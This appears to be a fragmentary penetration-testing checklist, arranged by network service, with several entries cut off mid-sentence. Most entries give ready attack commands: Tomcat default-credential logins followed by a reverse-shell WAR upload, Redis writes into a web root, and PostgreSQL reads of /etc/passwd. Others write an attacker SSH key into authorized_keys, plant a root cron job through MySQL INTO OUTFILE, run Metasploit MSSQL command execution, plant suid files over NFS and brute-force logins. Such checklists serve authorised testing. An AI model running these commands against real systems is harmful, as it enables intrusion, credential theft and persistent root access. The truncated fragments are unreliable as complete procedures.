-
Enumeration Mandatory Try to checkout a repo:svn checkout svn://$target Optional Check all branches Go through each revision. (Use grep widely!) Add a new file which could be accessible in the web.
-
Enumeration Mandatory Check on the HTTP port 8080 if /manager is accessible (default credentials: tomcat / s3cret or admin / admin). If yes, upload a reverse shell WAR file. Optional Try to brute-force with msf> use scanner/http/tomcat_mgr_login.
-
Enumeration Mandatory Try to connect:telnet $target 6379 // or: redis-cli -h $target...infoCONFIG GET *system.exec "id" Try to check if you can determine the existence of directories.config set dir /var/www/htdocs-ERR Changing directory: No such file or directoryconfig set dir /etc+OK Try to write. General commands:config set dir /var/www/html+OKconfig set dbfilename t.txt+OKset test "hallo"+OKsave+OK Possible places: Upload a…
-
Enumeration Mandatory Optional
-
Enumeration Optional Brute force with nmap.
-
Enumeration Mandatory Try to connect. Optional Privilege escalation within PSQL to superuser: https://staaldraad.github.io/post/2020–12-15-cve-2020–25695-postgresql-privesc/ Try to read files: postgres=# CREATE TABLE demo(t text);CREATE TABLEpostgres=# COPY demo from '/etc/passwd';COPY 20postgres=# SELECT * FROM demo; Try to write a file: COPY (select convert_from(decode('c3NoLXJzYSBBQUFBQjNOemFDMXljMkVBQUFBREFRQUJBQUFCQVFESWh5ZEc3aUQ5a0ZoMjJLMklmNFpyc2FvbHlINVBabkZZK3JqaXRKV3VXTGhjVTQxVWtVUEZOYVJJM1dZcVFWdlJZSlpHRTB1VkFacHJuZFJEbWJtMUVGZER0N1JLejdoQ0tJUytpTjNwMUVuVTcrOVpFVUdMTEYzc1NOTFFzalNmWTVJaTlzSWVHUU01UnltbURwdGp3VVJJaWk0Z3ErMTZzVWVnSTU4WHdlVkxIZ2R1M0wrVWJ1c2lxSHVyLy9sSy9KZTFsTnNNVnJuTXJ1dnZ6Q3dvdUNXL2ZSV1dXRGRUbXJ6MXNhbmx6N1F6QjNZS3RrdmxiNEthTE5kL20xaUJyaWtzMEkrM2Ruc3lGT1h4d1kzWkJjVHB2Q3k4ZzdueDllb28zTjJtVEVaSS83WUxIeGFWbTlMVDRzWEdDWUtUN3Z1eE1EUmZHajdYcnhQUGVUaEggcm9vdEBpbWFjMjAxOS1rYWxpCg==','base64'),'utf-8')) to '/var/lib/postgresql/.ssh/authorized_keys';
-
Enumeration Mandatory Try to connect within a window manager:rdesktop $target Optional If you have shell acess, try to create a new user account which is in the group Remote Desktop Users or add this group to an existing user.
-
Enumeration Mandatory Try to connect to the DB. Enumerate with nmap:nmap -sV -p 3306 --script mysql-audit,mysql-databases,mysql-dump-hashes,mysql-empty-password,mysql-enum,mysql-info,mysql-query,mysql-users,mysql-variables,mysql-vuln-cve2012-2122 $target Optional If you have access to the DB: Try to read local files:SELECT load_file('/etc/passwd'); Try to write files:CREATE TABLE bbb(content TEXT);INSERT INTO bbb (content) VALUES ("* * * * * root /tmp/shell_80.elf");SELECT * FROM bbb INTO OUTFILE '/etc/cron.d/ex1';
-
Enumeration Mandatory Determine version:nmap -p 445 --script ms-sql-info $target If credentials are known: Try to connect to the DB (alternative: IntelliJ, …):sqsh -U sa -P $password -S $target:1433 Try to execute commands:msf> use auxiliary/admin/mssql/mssql_execmsf> use windows/mssql/mssql_payload If mssql_exec doesn’t work, take care of domain/username and powershell.exe ‑command type system. Optional Brute-force login (e.g. with msf> use…
-
Enumeration Mandatory Check configuration:nmap -sSVC --script rmi-dumpregistry -p 1100 $target Optional Try msf> use scanner/misc/java_rmi_server if class upload is possible; if yes, try msf> use multi/misc/java_rmi_server. Try to exploit with BaRMIe.
-
Enumeration Mandatory Check which streams are open:nmap --script rtsp-url-brute -p 554 $target
-
Enumeration Mandatory Enumerate with ike-scan
-
See the LDAP checklist
-
Enumeration Mandatory Enumerate with nmap:nmap -n -sV --script "ldap* and not brute" $target Scan with LDAPsearch:ldapsearch -x -h $target -D '' -w '' -b "DC=BLA,DC=local" Connect to SSL ports:openssl s_client -connect $target:636 </dev/nullopenssl s_client -connect $target:3269 </dev/null
-
Note: 139 = NetBIOS is a session layer protocol and service and different from 445 SMB. Enumeration Mandatory If you have no credentials yet: If you have already user credentials: On Windows Optional
-
Enumeration Mandatory Get a list of registered programs via rpcbind/v2 (previous portmapper!):rpcinfo -p $target Get a list of registered programs via rpcbind/3:rpcinfo -s $target If successful: Connect with the RPC console:rpcclient -U "" $target Enumerate with the queries on the RPC protocol post. Optional Try to brute-force accounts (no lock here!) Try other enumeration tools from the…
-
Enumeration Mandatory Show users and processes from known ports:ident-user-enum $target 139 445 … <- add all known ports here
-
Enumeration Mandatory Check if the target exposes open shares:showmount -e $target If there are some, try to mount them. If you can mount them, check if you can write files and set the s flag. (If in export no_root_squash is defined.) If yes, create a new file with a suid bit. Optional Try to use another NFS…
-
Enumeration Tools kerbrutepython3 /opt/kerbrute/kerbrute.py -domain thinc.local -users /usr/share/seclists/Usernames/Names/names.txt -dc-ip $target Alternative https://github.com/ropnop/kerbrute msf> use auxiliary/gather/kerberos_enumusers Perform ASREPRoast
-
Enumeration Mandatory Grab the banner. Tools Patator (brute force)
-
Enumeration Mandatory Try to access ssh ‑v $target Optional Reuse existing credentials Brute-force with existing usernames (Password-spraying) Try ssh-audit $target Try known usernaes with username as password or other found strings. Privilege Escalation Find .ssh directory on the file system and check all files within. Check sshd_config file. Check SSH version for exploits.
-
Enumeration Check the certificate Perform SSL-Scan Go to Checklist 80 HTTP Optional if vulnerable against heartbleed, use msf> use openssl_heartbleed. Don’t forget to use set ACTION KEYS or similar (see info)
-
Enumeration Mandatory Check anonymous login Try to create AND upload a file: mkdir test put /tmp/test test Check login with at least the following credentials: admin / admin admin / password Optional Download everything with wget and look for .dot files! Check login with newly found users Brute-force login Make sure to check admin / admin and other usual combinations…
-
Enumeration Mandatory Optional Tools
-
Without shell access With shell access Choose one method to enumerate. 1. User and group enumeration with net (!) See what roles/privileges THIS USER has. Also localy. Maybe he/she has already administrative privileges. whoami /all List (and store!) the users of the domain net user /domain List (and store!) information like full names, group memberships, etc.…